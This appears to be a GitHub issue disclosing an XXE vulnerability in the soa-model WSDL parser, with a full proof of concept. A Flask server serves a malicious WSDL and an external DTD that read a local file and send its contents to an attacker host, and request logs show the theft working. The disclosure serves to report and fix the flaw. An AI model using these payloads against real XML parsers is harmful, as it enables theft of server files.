search

membrane / soa-model

Toolkit and Java API for WSDL, WADL and XML Schema.
http://www.membrane-soa.org/soa-model/
Apache License 2.0
93 stars 73 forks source link

There is an XXE vulnerability in parsing wsdl. #281

Closed yuligesec closed 3 years ago

yuligesec commented 3 years ago

There is an XXE vulnerability in parsing wsdl.

Add pom.xml the latest version of soa-model-core.

<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core -->
<dependency>
    <groupId>com.predic8</groupId>
    <artifactId>soa-model-core</artifactId>
    <version>1.6.3</version>
</dependency>

XXE vulnerability appeared when crawling remote wsdl file and parsing.

import com.predic8.wsdl.*;
public class testxxe {
    public static void main(String[] args) {
        WSDLParser parser = new WSDLParser();
        Definitions defs = parser.parse("http://ip:10000/testxxeService?wsdl");
    }
}

Construct server with evil wsdl file by flask

from flask import Flask, Response,request

app = Flask(__name__)

@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    global num
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://ip:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml',status=200)
@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    global num
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:10000/?filecontent=%file;'>">
%int;
%send;"""
    return Response(xml, mimetype='text/xml',status=200)
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)

Create a test file /tmp/123

$ echo 123123 > /tmp/123
$ cat /tmp/123
123123

Run java code and xxe attack successfully.

127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -
core/src/main/groovy/com/predic8/schema/Include.groovy line42
def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource)

core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy line51:
XMLInputFactory.newInstance().createXMLStreamReader(res)

Reference https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report XMLInputFactory allow load DTD, so there is an xxe vulnerability.